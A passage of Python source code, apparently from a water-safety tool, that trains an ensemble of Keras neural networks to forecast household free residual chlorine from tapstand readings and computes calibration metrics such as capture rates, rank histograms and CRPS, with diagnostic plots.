self.valid_dates(self.file["ts_datetime"]),
)
self.execute_rule(
"Invalid household date/time",
"hh_datetime",
self.valid_dates(self.file["hh_datetime"]),
)
self.skipped_rows = df.loc[df.index.difference(self.file.index)]
self.file.reset_index(drop=True, inplace=True) # fix dropped indices in pandas
# Locate the rows of the missing data
drop_threshold = 0.90 * len(self.file.loc[:, [FRC_IN]])
nan_rows_watt = self.file.loc[self.file[WATTEMP].isnull()]
if len(nan_rows_watt) < drop_threshold:
self.execute_rule(
"Missing Water Temperature Measurement",
WATTEMP,
self.file[WATTEMP].isnull(),
)
nan_rows_cond = self.file.loc[self.file[COND].isnull()]
if len(nan_rows_cond) < drop_threshold:
self.execute_rule("Missing EC Measurement", COND, self.file[COND].isnull())
self.skipped_rows = df.loc[df.index.difference(self.file.index)]
self.file.reset_index(drop=True, inplace=True)
start_date = self.file["ts_datetime"]
end_date = self.file["hh_datetime"]
durations = []
all_dates = []
collection_time = []
for i in range(len(start_date)):
try:
# excel type
start = float(start_date[i])
end = float(end_date[i])
start = xldate_as_datetime(start, datemode=0)
if start.hour > 12:
collection_time = np.append(collection_time, 1)
else:
collection_time = np.append(collection_time, 0)
end = xldate_as_datetime(end, datemode=0)
except ValueError:
# kobo type
start = start_date[i][:16].replace("/", "-")
end = end_date[i][:16].replace("/", "-")
start = datetime.datetime.strptime(start, self.xl_dateformat)
if start.hour > 12:
collection_time = np.append(collection_time, 1)
else:
collection_time = np.append(collection_time, 0)
end = datetime.datetime.strptime(end, self.xl_dateformat)
durations.append((end - start).total_seconds())
all_dates.append(datetime.datetime.strftime(start, self.xl_dateformat))
self.durations = durations
self.time_of_collection = collection_time
self.avg_time_elapsed = np.mean(durations)
# Extract the column of dates for all data and put them in YYYY-MM-DD format
self.file["formatted_date"] = all_dates
predictors = {
FRC_IN: self.file[FRC_IN],
"elapsed time": (np.array(self.durations) / 3600),
"time of collection (0=AM, 1=PM)": self.time_of_collection,
}
self.targets = self.file.loc[:, FRC_OUT]
self.var_names = [
"Tapstand FRC (mg/L)",
"Elapsed Time",
"time of collection (0=AM, 1=PM)",
]
self.predictors = pd.DataFrame(predictors)
if len(nan_rows_watt) < drop_threshold:
self.predictors[WATTEMP] = self.file[WATTEMP]
self.var_names.append("Water Temperature(" + r"$\degree$" + "C)")
self.median_wattemp = np.median(self.file[WATTEMP].dropna().to_numpy())
self.upper95_wattemp = np.percentile(
self.file[WATTEMP].dropna().to_numpy(), 95
)
if len(nan_rows_cond) < drop_threshold:
self.predictors[COND] = self.file[COND]
self.var_names.append("EC (" + r"$\mu$" + "s/cm)")
self.median_cond = np.median(self.file[COND].dropna().to_numpy())
self.upper95_cond = np.percentile(self.file[COND].dropna().to_numpy(), 95)
self.targets = self.targets.values.reshape(-1, 1)
self.datainputs = self.predictors
self.dataoutputs = self.targets
self.input_filename = filename
def set_up_model(self):
self.optimizer = keras.optimizers.Nadam(lr=0.01, beta_1=0.9, beta_2=0.999)
self.model = keras.models.Sequential()
self.model.add(
keras.layers.Dense(
self.layer1_neurons,
input_dim=len(self.datainputs.columns),
activation="tanh",
)
)
self.model.add(keras.layers.Dense(1, activation="linear"))
self.model.compile(loss="mse", optimizer=self.optimizer)
def train_SWOT_network(self, directory):
"""Train the set of 200 neural networks on SWOT data
Trains an ensemble of 200 neural networks on se1_frc, water temperature,
water conductivity."""
if not os.path.exists(directory):
os.makedirs(directory)
self.predictors_scaler = self.predictors_scaler.fit(self.predictors)
self.targets_scaler = self.targets_scaler.fit(self.targets)
x = self.predictors
t = self.targets
self.calibration_predictions = []
self.trained_models = {}
for i in range(self.network_count):
logging.info('Training Network ' + str(i))
model_out = self.train_network(x, t, directory)
self.trained_models.update({'model_' + str(i): model_out})
def train_network(self, x, t, directory):
"""
Trains a single Neural Network on imported data.
This method trains Neural Network on data that have previously been imported
to the network using the import_data_from_csv() method.
The network used is a Multilayer Perceptron (MLP). Input and Output data are
normalized using MinMax Normalization.
The input dataset is split in training and validation datasets, where 80% of the inputs
are the training dataset and 20% is the validation dataset.
The training history is stored in a variable called self.history (see keras documentation:
keras.model.history object)
Performance metrics are calculated and stored for evaluating the network performance.
"""
tf.keras.backend.clear_session()
early_stopping_monitor = keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0, patience=10,
restore_best_weights=True)
x_norm = self.predictors_scaler.transform(x)
t_norm = self.targets_scaler.transform(t)
trained_model = keras.models.clone_model(self.model)
x_norm_train, x_norm_val, t_norm_train, t_norm_val = train_test_split(x_norm, t_norm, train_size=0.333,
shuffle=True)
new_weights = [np.random.uniform(-0.05, 0.05, w.shape) for w in trained_model.get_weights()]
trained_model.set_weights(new_weights)
trained_model.compile(loss='mse', optimizer=self.optimizer)
trained_model.fit(x_norm_train, t_norm_train, epochs=self.epochs, validation_data=(x_norm_val, t_norm_val),
callbacks=[early_stopping_monitor], verbose=0, batch_size=len(t_norm_train))
self.calibration_predictions.append(self.targets_scaler.inverse_transform(trained_model.predict(x_norm)))
return trained_model
def calibration_performance_evaluation(self, filename):
Y_true = np.array(self.targets)
Y_pred = np.array(self.calibration_predictions)
FRC_X = self.datainputs[FRC_IN].to_numpy()
capture_all = (
np.less_equal(Y_true, np.max(Y_pred, axis=0))
* np.greater_equal(Y_true, np.min(Y_pred, axis=0))
* 1
)
capture_90 = (
np.less_equal(Y_true, np.percentile(Y_pred, 95, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 5, axis=0))
* 1
)
capture_80 = (
np.less_equal(Y_true, np.percentile(Y_pred, 90, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 10, axis=0))
* 1
)
capture_70 = (
np.less_equal(Y_true, np.percentile(Y_pred, 85, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 15, axis=0))
* 1
)
capture_60 = (
np.less_equal(Y_true, np.percentile(Y_pred, 80, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 20, axis=0))
* 1
)
capture_50 = (
np.less_equal(Y_true, np.percentile(Y_pred, 75, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 25, axis=0))
* 1
)
capture_40 = (
np.less_equal(Y_true, np.percentile(Y_pred, 70, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 30, axis=0))
* 1
)
capture_30 = (
np.less_equal(Y_true, np.percentile(Y_pred, 65, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 35, axis=0))
* 1
)
capture_20 = (
np.less_equal(Y_true, np.percentile(Y_pred, 60, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 40, axis=0))
* 1
)
capture_10 = (
np.less_equal(Y_true, np.percentile(Y_pred, 55, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 45, axis=0))
* 1
)
capture_all_20 = capture_all * np.less(Y_true, 0.2)
capture_90_20 = capture_90 * np.less(Y_true, 0.2)
capture_80_20 = capture_80 * np.less(Y_true, 0.2)
capture_70_20 = capture_70 * np.less(Y_true, 0.2)
capture_60_20 = capture_60 * np.less(Y_true, 0.2)
capture_50_20 = capture_50 * np.less(Y_true, 0.2)
capture_40_20 = capture_40 * np.less(Y_true, 0.2)
capture_30_20 = capture_30 * np.less(Y_true, 0.2)
capture_20_20 = capture_20 * np.less(Y_true, 0.2)
capture_10_20 = capture_10 * np.less(Y_true, 0.2)
length_20 = np.sum(np.less(Y_true, 0.2))
test_len = len(Y_true)
capture_all_sum = np.sum(capture_all)
capture_90_sum = np.sum(capture_90)
capture_80_sum = np.sum(capture_80)
capture_70_sum = np.sum(capture_70)
capture_60_sum = np.sum(capture_60)
capture_50_sum = np.sum(capture_50)
capture_40_sum = np.sum(capture_40)
capture_30_sum = np.sum(capture_30)
capture_20_sum = np.sum(capture_20)
capture_10_sum = np.sum(capture_10)
capture_all_20_sum = np.sum(capture_all_20)
capture_90_20_sum = np.sum(capture_90_20)
capture_80_20_sum = np.sum(capture_80_20)
capture_70_20_sum = np.sum(capture_70_20)
capture_60_20_sum = np.sum(capture_60_20)
capture_50_20_sum = np.sum(capture_50_20)
capture_40_20_sum = np.sum(capture_40_20)
capture_30_20_sum = np.sum(capture_30_20)
capture_20_20_sum = np.sum(capture_20_20)
capture_10_20_sum = np.sum(capture_10_20)
capture = [
capture_10_sum / test_len,
capture_20_sum / test_len,
capture_30_sum / test_len,
capture_40_sum / test_len,
capture_50_sum / test_len,
capture_60_sum / test_len,
capture_70_sum / test_len,
capture_80_sum / test_len,
capture_90_sum / test_len,
capture_all_sum / test_len,
]
capture_20 = [
capture_10_20_sum / length_20,
capture_20_20_sum / length_20,
capture_30_20_sum / length_20,
capture_40_20_sum / length_20,
capture_50_20_sum / length_20,
capture_60_20_sum / length_20,
capture_70_20_sum / length_20,
capture_80_20_sum / length_20,
capture_90_20_sum / length_20,
capture_all_20_sum / length_20,
]
self.percent_capture_cal = capture_all_sum / test_len
self.percent_capture_02_cal = capture_all_20_sum / length_20
self.CI_reliability_cal = (
(0.1 - capture_10_sum / test_len) ** 2
+ (0.2 - capture_20_sum / test_len) ** 2
+ (0.3 - capture_30_sum / test_len) ** 2
+ (0.4 - capture_40_sum / test_len) ** 2
+ (0.5 - capture_50_sum / test_len) ** 2
+ (0.6 - capture_60_sum / test_len) ** 2
+ (0.7 - capture_70_sum / test_len) ** 2
+ (0.8 - capture_80_sum / test_len) ** 2
+ (0.9 - capture_90_sum / test_len) ** 2
+ (1 - capture_all_sum / test_len) ** 2
)
self.CI_reliability_02_cal = (
(0.1 - capture_10_20_sum / length_20) ** 2
+ (0.2 - capture_20_20_sum / length_20) ** 2
+ (0.3 - capture_30_20_sum / length_20) ** 2
+ (0.4 - capture_40_20_sum / length_20) ** 2
+ (0.5 - capture_50_20_sum / length_20) ** 2
+ (0.6 - capture_60_20_sum / length_20) ** 2
+ (0.7 - capture_70_20_sum / length_20) ** 2
+ (0.8 - capture_80_20_sum / length_20) ** 2
+ (0.9 - capture_90_20_sum / length_20) ** 2
+ (1 - capture_all_20_sum / length_20) ** 2
)
# Rank Histogram
rank = []
for a in range(0, len(Y_true)):
n_lower = np.sum(np.greater(Y_true[a], Y_pred[:, a]))
n_equal = np.sum(np.equal(Y_true[a], Y_pred[:, a]))
deviate_rank = np.random.random_integers(0, n_equal)
rank = np.append(rank, n_lower + deviate_rank)
rank_hist = np.histogram(rank, bins=self.network_count + 1)
delta = np.sum((rank_hist[0] - (test_len / ((self.network_count + 1)))) ** 2)
delta_0 = self.network_count * test_len / (self.network_count + 1)
self.delta_score_cal = delta / delta_0
c = self.network_count
alpha = np.zeros((test_len, (c + 1)))
beta = np.zeros((test_len, (c + 1)))
low_outlier = 0
high_outlier = 0
for a in range(0, test_len):
observation = Y_true[a]
forecast = np.sort(Y_pred[:, a])
for b in range(1, c):
if observation > forecast[b]:
alpha[a, b] = forecast[b] - forecast[b - 1]
beta[a, b] = 0
elif forecast[b] > observation > forecast[b - 1]:
alpha[a, b] = observation - forecast[b - 1]
beta[a, b] = forecast[b] - observation
else:
alpha[a, b] = 0
beta[a, b] = forecast[b] - forecast[b - 1]
# overwrite boundaries in case of outliers
if observation < forecast[0]:
beta[a, 0] = forecast[0] - observation
low_outlier += 1
if observation > forecast[c - 1]:
alpha[a, c] = observation - forecast[c - 1]
high_outlier += 1
alpha_bar = np.mean(alpha, axis=0)
beta_bar = np.mean(beta, axis=0)
g_bar = alpha_bar + beta_bar
o_bar = beta_bar / (alpha_bar + beta_bar)
if low_outlier > 0:
o_bar[0] = low_outlier / test_len
g_bar[0] = beta_bar[0] / o_bar[0]
else:
o_bar[0] = 0
g_bar[0] = 0
if high_outlier > 0:
o_bar[c] = high_outlier / test_len
g_bar[c] = alpha_bar[c] / o_bar[c]
else:
o_bar[c] = 0
g_bar[c] = 0
p_i = np.arange(0 / c, (c + 1) / c, 1 / c)
self.CRPS_cal = np.sum(
g_bar * ((1 - o_bar) * (p_i**2) + o_bar * ((1 - p_i) ** 2))
)
CI_x = [0.10, 0.20, 0.30, 0.40, 0.50, 0.60, 0.70, 0.80, 0.90, 1.00]
fig = plt.figure(figsize=(15, 10), dpi=100)
gridspec.GridSpec(2, 3)
plt.subplot2grid((2, 3), (0, 0), colspan=2, rowspan=2)
plt.axhline(0.2, c="k", ls="--", label="Point-of-consumption FRC = 0.2 mg/L")
plt.scatter(
FRC_X, Y_true, edgecolors="k", facecolors="None", s=20, label="Observed"
)
plt.scatter(
FRC_X,
np.median(Y_pred, axis=0),
facecolors="r",
edgecolors="None",
s=10,
label="Forecast Median",
)
plt.vlines(
FRC_X,
np.min(Y_pred, axis=0),
np.max(Y_pred, axis=0),
color="r",
label="Forecast Range",
)
plt.xlabel("Point-of-Distribution FRC (mg/L)")
plt.ylabel("Point-of-Consumption FRC (mg/L)")
plt.xlim([0, np.max(FRC_X)])
plt.legend(
bbox_to_anchor=(0.001, 0.999),
shadow=False,
labelspacing=0.1,
fontsize="small",
handletextpad=0.1,
loc="upper left",
)
ax1 = fig.axes[0]
ax1.set_title("(a)", y=0.88, x=0.05)
plt.subplot2grid((2, 3), (0, 2), colspan=1, rowspan=1)
plt.plot(CI_x, CI_x, c="k")
plt.scatter(CI_x, capture, label="All observations")
plt.scatter(CI_x, capture_20, label="Point-of-Consumption FRC below 0.2 mg/L")
plt.xlabel("Ensemble Confidence Interval")
plt.ylabel("Percent Capture")
plt.ylim([0, 1])
plt.xlim([0, 1])
plt.legend(
bbox_to_anchor=(0.001, 0.999),
shadow=False,
labelspacing=0.1,
fontsize="small",
handletextpad=0.1,
loc="upper left",
)
ax2 = fig.axes[1]
ax2.set_title("(b)", y=0.88, x=0.05)
plt.subplot2grid((2, 3), (1, 2), colspan=1, rowspan=1)
plt.hist(rank, bins=(self.network_count + 1), density=True)
plt.xlabel("Rank")
plt.ylabel("Probability")
ax3 = fig.axes[2]
ax3.set_title("(c)", y=0.88, x=0.05)
plt.savefig(
os.path.splitext(filename)[0] + "_Calibration_Diagnostic_Figs.png",
format="png",
bbox_inches="tight",
)
plt.close()
myStringIOBytes = io.BytesIO()
plt.savefig(myStringIOBytes, format="png", bbox_inches="tight")
myStringIOBytes.seek(0)
my_base_64_pngData = base64.b64encode(myStringIOBytes.read())
return my_base_64_pngData
def get_bw(self):
Y_true = np.array(self.targets)
Y_pred = np.array(self.calibration_predictions)[:, :, 0]
s2 = []
xt_yt = []
for a in range(0, len(Y_true)):
observation = Y_true[a]
forecast = np.sort(Y_pred[:, a])
s2 = np.append(s2, np.var(forecast))
xt_yt = np.append(xt_yt, (np.mean(forecast) - observation) ** 2)
WB_bw = np.mean(xt_yt) - (1 + 1 / self.network_count) * np.mean(s2)
return WB_bw
def post_process_performance_eval(self, bandwidth):
Y_true = np.squeeze(np.array(self.targets))
Y_pred = np.array(self.calibration_predictions)[:, :, 0]
test_len = len(Y_true)
min_CI = []
max_CI = []
CI_90_Lower = []
CI_90_Upper = []
CI_80_Lower = []
CI_80_Upper = []
CI_70_Lower = []
CI_70_Upper = []
CI_60_Lower = []
CI_60_Upper = []
CI_50_Lower = []
CI_50_Upper = []
CI_40_Lower = []
CI_40_Upper = []
CI_30_Lower = []
CI_30_Upper = []
CI_20_Lower = []
CI_20_Upper = []
CI_10_Lower = []
CI_10_Upper = []
CI_median = []
CRPS = []
Kernel_Risk = []
evaluation_range = np.arange(-10, 10.001, 0.001)
# compute CRPS as well as the confidence intervals of each ensemble forecast
for a in range(0, test_len):
scipy_kde = scipy.stats.gaussian_kde(Y_pred[:, a], bw_method=bandwidth)
scipy_pdf = scipy_kde.evaluate(evaluation_range) * 0.001
scipy_cdf = np.cumsum(scipy_pdf)
min_CI = np.append(
min_CI, evaluation_range[np.max(np.where(scipy_cdf == 0)[0])]
)
max_CI = np.append(max_CI, evaluation_range[np.argmax(scipy_cdf)])
CI_90_Lower = np.append(
CI_90_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.05)))]
)
CI_90_Upper = np.append(
CI_90_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.95)))]
)
CI_80_Lower = np.append(
CI_80_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.1)))]
)
CI_80_Upper = np.append(
CI_80_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.9)))]
)
CI_70_Lower = np.append(
CI_70_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.15)))]
)
CI_70_Upper = np.append(
CI_70_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.85)))]
)
CI_60_Lower = np.append(
CI_60_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.2)))]
)
CI_60_Upper = np.append(
CI_60_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.8)))]
)
CI_50_Lower = np.append(
CI_50_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.25)))]
)
CI_50_Upper = np.append(
CI_50_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.75)))]
)
CI_40_Lower = np.append(
CI_40_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.3)))]
)
CI_40_Upper = np.append(
CI_40_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.7)))]
)
CI_30_Lower = np.append(
CI_30_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.35)))]
)
CI_30_Upper = np.append(
CI_30_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.65)))]
)
CI_20_Lower = np.append(
CI_20_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.4)))]
)
CI_20_Upper = np.append(
CI_20_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.6)))]
)
CI_10_Lower = np.append(
CI_10_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.45)))]
)
CI_10_Upper = np.append(
CI_10_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.55)))]
)
CI_median = np.append(
CI_median, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.50)))]
)
Kernel_Risk = np.append(Kernel_Risk, scipy_kde.integrate_box_1d(-10, 0.2))
Heaviside = (evaluation_range >= Y_true[a]).astype(int)
CRPS_dif = (scipy_cdf - Heaviside) ** 2
CRPS = np.append(CRPS, np.sum(CRPS_dif * 0.001))
mean_CRPS = np.mean(CRPS)
capture_all = (
np.less_equal(Y_true, max_CI) * np.greater_equal(Y_true, min_CI) * 1
)
capture_90 = (
np.less_equal(Y_true, CI_90_Upper)
* np.greater_equal(Y_true, CI_90_Lower)
* 1
)
capture_80 = (
np.less_equal(Y_true, CI_80_Upper)
* np.greater_equal(Y_true, CI_80_Lower)
* 1
)
capture_70 = (
np.less_equal(Y_true, CI_70_Upper)
* np.greater_equal(Y_true, CI_70_Lower)
* 1
)
capture_60 = (
np.less_equal(Y_true, CI_60_Upper)
* np.greater_equal(Y_true, CI_60_Lower)
* 1
)
capture_50 = (
np.less_equal(Y_true, CI_50_Upper)
* np.greater_equal(Y_true, CI_50_Lower)
* 1
)
capture_40 = (
np.less_equal(Y_true, CI_40_Upper)
* np.greater_equal(Y_true, CI_40_Lower)
* 1
)
capture_30 = (
np.less_equal(Y_true, CI_30_Upper)
* np.greater_equal(Y_true, CI_30_Lower)
* 1
)
capture_20 = (
np.less_equal(Y_true, CI_20_Upper)
* np.greater_equal(Y_true, CI_20_Lower)
* 1
)
capture_10 = (
np.less_equal(Y_true, CI_10_Upper)
* np.greater_equal(Y_true, CI_10_Lower)
* 1
)
length_20 = np.sum(np.less(Y_true, 0.2))
capture_all_20 = capture_all * np.less(Y_true, 0.2)
capture_90_20 = capture_90 * np.less(Y_true, 0.2)
capture_80_20 = capture_80 * np.less(Y_true, 0.2)
capture_70_20 = capture_70 * np.less(Y_true, 0.2)
capture_60_20 = capture_60 * np.less(Y_true, 0.2)
capture_50_20 = capture_50 * np.less(Y_true, 0.2)
capture_40_20 = capture_40 * np.less(Y_true, 0.2)
capture_30_20 = capture_30 * np.less(Y_true, 0.2)
capture_20_20 = capture_20 * np.less(Y_true, 0.2)
capture_10_20 = capture_10 * np.less(Y_true, 0.2)
capture_all_sum = np.sum(capture_all)
capture_90_sum = np.sum(capture_90)
capture_80_sum = np.sum(capture_80)
capture_70_sum = np.sum(capture_70)
capture_60_sum = np.sum(capture_60)
capture_50_sum = np.sum(capture_50)
capture_40_sum = np.sum(capture_40)
capture_30_sum = np.sum(capture_30)
capture_20_sum = np.sum(capture_20)
capture_10_sum = np.sum(capture_10)
capture_all_20_sum = np.sum(capture_all_20)
capture_90_20_sum = np.sum(capture_90_20)
capture_80_20_sum = np.sum(capture_80_20)
capture_70_20_sum = np.sum(capture_70_20)
capture_60_20_sum = np.sum(capture_60_20)
capture_50_20_sum = np.sum(capture_50_20)
capture_40_20_sum = np.sum(capture_40_20)
capture_30_20_sum = np.sum(capture_30_20)
capture_20_20_sum = np.sum(capture_20_20)
capture_10_20_sum = np.sum(capture_10_20)
capture_sum_squares = (
(0.1 - capture_10_sum / test_len) ** 2
+ (0.2 - capture_20_sum / test_len) ** 2
+ (0.3 - capture_30_sum / test_len) ** 2
+ (0.4 - capture_40_sum / test_len) ** 2
+ (0.5 - capture_50_sum / test_len) ** 2
+ (0.6 - capture_60_sum / test_len) ** 2
+ (0.7 - capture_70_sum / test_len) ** 2
+ (0.8 - capture_80_sum / test_len) ** 2
+ (0.9 - capture_90_sum / test_len) ** 2
+ (1 - capture_all_sum / test_len) ** 2
)
capture_20_sum_squares = (
(0.1 - capture_10_20_sum / length_20) ** 2
+ (0.2 - capture_20_20_sum / length_20) ** 2
+ (0.3 - capture_30_20_sum / length_20) ** 2
+ (0.4 - capture_40_20_sum / length_20) ** 2
+ (0.5 - capture_50_20_sum / length_20) ** 2
+ (0.6 - capture_60_20_sum / length_20) ** 2
+ (0.7 - capture_70_20_sum / length_20) ** 2
+ (0.8 - capture_80_20_sum / length_20) ** 2
+ (0.9 - capture_90_20_sum / length_20) ** 2
+ (1 - capture_all_20_sum / length_20) ** 2
)
return (
mean_CRPS,
capture_sum_squares,
capture_20_sum_squares,
capture_all_sum / test_len,
capture_all_20_sum / length_20,
)
def post_process_cal(self):
self.WB_bandwidth = self.get_bw()
(
self.CRPS_post_cal,
self.CI_reliability_post_cal,
self.CI_reliability_02_post_cal,
self.percent_capture_post_cal,
self.percent_capture_02_post_cal,
) = self.post_process_performance_eval(self.WB_bandwidth)
CRPS_Skill = (self.CRPS_post_cal - self.CRPS_cal) / (0 - self.CRPS_cal)
CI_Skill = (self.CI_reliability_post_cal - self.CI_reliability_cal) / (
0 - self.CI_reliability_cal
)
CI_20_Skill = (self.CI_reliability_02_post_cal - self.CI_reliability_02_cal) / (
0 - self.CI_reliability_02_cal
)
PC_Skill = (self.percent_capture_post_cal - self.percent_capture_cal) / (
1 - self.percent_capture_cal
)
PC_20_Skill = (
self.percent_capture_02_post_cal - self.percent_capture_02_cal
) / (1 - self.percent_capture_02_cal)
Net_Score = CRPS_Skill + CI_Skill + CI_20_Skill + PC_Skill + PC_20_Skill
if Net_Score > 0:
self.post_process_check = True
else:
self.post_process_check = False
def full_performance_evaluation(self, directory):
x_norm = self.predictors_scaler.transform(self.predictors)
t_norm = self.targets_scaler.transform(self.targets)
base_model = self.model
base_model.save(directory + "\\base_network.h5")
x_cal_norm, x_test_norm, t_cal_norm, t_test_norm = train_test_split(
x_norm, t_norm, test_size=0.25, shuffle=False, random_state=10
)
self.verifying_observations = self.targets_scaler.inverse_transform(t_test_norm)
self.test_x_data = self.predictors_scaler.inverse_transform(x_test_norm)
early_stopping_monitor = keras.callbacks.EarlyStopping(
monitor="val_loss", min_delta=0, patience=10, restore_best_weights=True
)
self.verifying_predictions = []
for i in range(0, self.network_count):
tf.keras.backend.clear_session()
self.model = keras.models.load_model(directory + "\\base_network.h5")
x_norm_train, x_norm_val, t_norm_train, t_norm_val = train_test_split(
x_cal_norm,
t_cal_norm,
train_size=1 / 3,
shuffle=True,
random_state=i**2,
)
new_weights = [
np.random.uniform(-0.05, 0.05, w.shape)
for w in self.model.get_weights()
]
self.model.set_weights(new_weights)
self.model.fit(
x_norm_train,
t_norm_train,
epochs=self.epochs,
validation_data=(x_norm_val, t_norm_val),
callbacks=[early_stopping_monitor],
verbose=0,
batch_size=len(t_norm_train),
)
self.verifying_predictions.append(self.targets_scaler.inverse_transform(self.model.predict(x_test_norm)))
Y_true = np.array(self.verifying_observations)
Y_pred = np.array(self.verifying_predictions)
FRC_X = self.test_x_data[:, 0]
capture_all = (
np.less_equal(Y_true, np.max(Y_pred, axis=0))
* np.greater_equal(Y_true, np.min(Y_pred, axis=0))
* 1
)
capture_90 = (
np.less_equal(Y_true, np.percentile(Y_pred, 95, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 5, axis=0))
* 1
)
capture_80 = (
np.less_equal(Y_true, np.percentile(Y_pred, 90, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 10, axis=0))
* 1
)
capture_70 = (
np.less_equal(Y_true, np.percentile(Y_pred, 85, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 15, axis=0))
* 1
)
capture_60 = (
np.less_equal(Y_true, np.percentile(Y_pred, 80, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 20, axis=0))
* 1
)
capture_50 = (
np.less_equal(Y_true, np.percentile(Y_pred, 75, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 25, axis=0))
* 1
)
capture_40 = (
np.less_equal(Y_true, np.percentile(Y_pred, 70, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 30, axis=0))
* 1
)
capture_30 = (
np.less_equal(Y_true, np.percentile(Y_pred, 65, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 35, axis=0))
* 1
)
capture_20 = (
np.less_equal(Y_true, np.percentile(Y_pred, 60, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 40, axis=0))
* 1
)
capture_10 = (
np.less_equal(Y_true, np.percentile(Y_pred, 55, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 45, axis=0))
* 1
)
capture_all_20 = capture_all * np.less(Y_true, 0.2)
capture_90_20 = capture_90 * np.less(Y_true, 0.2)
capture_80_20 = capture_80 * np.less(Y_true, 0.2)
capture_70_20 = capture_70 * np.less(Y_true, 0.2)
capture_60_20 = capture_60 * np.less(Y_true, 0.2)
capture_50_20 = capture_50 * np.less(Y_true, 0.2)
capture_40_20 = capture_40 * np.less(Y_true, 0.2)
capture_30_20 = capture_30 * np.less(Y_true, 0.2)
capture_20_20 = capture_20 * np.less(Y_true, 0.2)
capture_10_20 = capture_10 * np.less(Y_true, 0.2)
length_20 = np.sum(np.less(Y_true, 0.2))
test_len = len(Y_true)
capture_all_sum = np.sum(capture_all)
capture_90_sum = np.sum(capture_90)
capture_80_sum = np.sum(capture_80)
capture_70_sum = np.sum(capture_70)
capture_60_sum = np.sum(capture_60)
capture_50_sum = np.sum(capture_50)
capture_40_sum = np.sum(capture_40)
capture_30_sum = np.sum(capture_30)
capture_20_sum = np.sum(capture_20)
capture_10_sum = np.sum(capture_10)
capture_all_20_sum = np.sum(capture_all_20)
capture_90_20_sum = np.sum(capture_90_20)
capture_80_20_sum = np.sum(capture_80_20)
capture_70_20_sum = np.sum(capture_70_20)
capture_60_20_sum = np.sum(capture_60_20)
capture_50_20_sum = np.sum(capture_50_20)
capture_40_20_sum = np.sum(capture_40_20)
capture_30_20_sum = np.sum(capture_30_20)
capture_20_20_sum = np.sum(capture_20_20)
capture_10_20_sum = np.sum(capture_10_20)
capture = [
capture_10_sum / test_len,
capture_20_sum / test_len,
capture_30_sum / test_len,
capture_40_sum / test_len,
capture_50_sum / test_len,
capture_60_sum / test_len,
capture_70_sum / test_len,
capture_80_sum / test_len,
capture_90_sum / test_len,
capture_all_sum / test_len,
]
capture_20 = [
capture_10_20_sum / length_20,
capture_20_20_sum / length_20,
capture_30_20_sum / length_20,
capture_40_20_sum / length_20,
capture_50_20_sum / length_20,
capture_60_20_sum / length_20,
capture_70_20_sum / length_20,
capture_80_20_sum / length_20,
capture_90_20_sum / length_20,
capture_all_20_sum / length_20,
]
self.percent_capture_cal = capture_all_sum / test_len
self.percent_capture_02_cal = capture_all_20_sum / length_20
self.CI_reliability_cal = (
(0.1 - capture_10_sum / test_len) ** 2
+ (0.2 - capture_20_sum / test_len) ** 2
+ (0.3 - capture_30_sum / test_len) ** 2
+ (0.4 - capture_40_sum / test_len) ** 2
+ (0.5 - capture_50_sum / test_len) ** 2
+ (0.6 - capture_60_sum / test_len) ** 2
+ (0.7 - capture_70_sum / test_len) ** 2
+ (0.8 - capture_80_sum / test_len) ** 2
+ (0.9 - capture_90_sum / test_len) ** 2
+ (1 - capture_all_sum / test_len) ** 2
)
self.CI_reliability_02_cal = (
(0.1 - capture_10_20_sum / length_20) ** 2
+ (0.2 - capture_20_20_sum / length_20) ** 2
+ (0.3 - capture_30_20_sum / length_20) ** 2
+ (0.4 - capture_40_20_sum / length_20) ** 2
+ (0.5 - capture_50_20_sum / length_20) ** 2
+ (0.6 - capture_60_20_sum / length_20) ** 2
+ (0.7 - capture_70_20_sum / length_20) ** 2
+ (0.8 - capture_80_20_sum / length_20) ** 2
+ (0.9 - capture_90_20_sum / length_20) ** 2
+ (1 - capture_all_20_sum / length_20) ** 2
)
# Rank Histogram
rank = []
for a in range(0, len(Y_true)):
n_lower = np.sum(np.greater(Y_true[a], Y_pred[:, a]))
n_equal = np.sum(np.equal(Y_true[a], Y_pred[:, a]))
deviate_rank = np.random.random_integers(0, n_equal)
rank = np.append(rank, n_lower + deviate_rank)
rank_hist = np.histogram(rank, bins=self.network_count + 1)
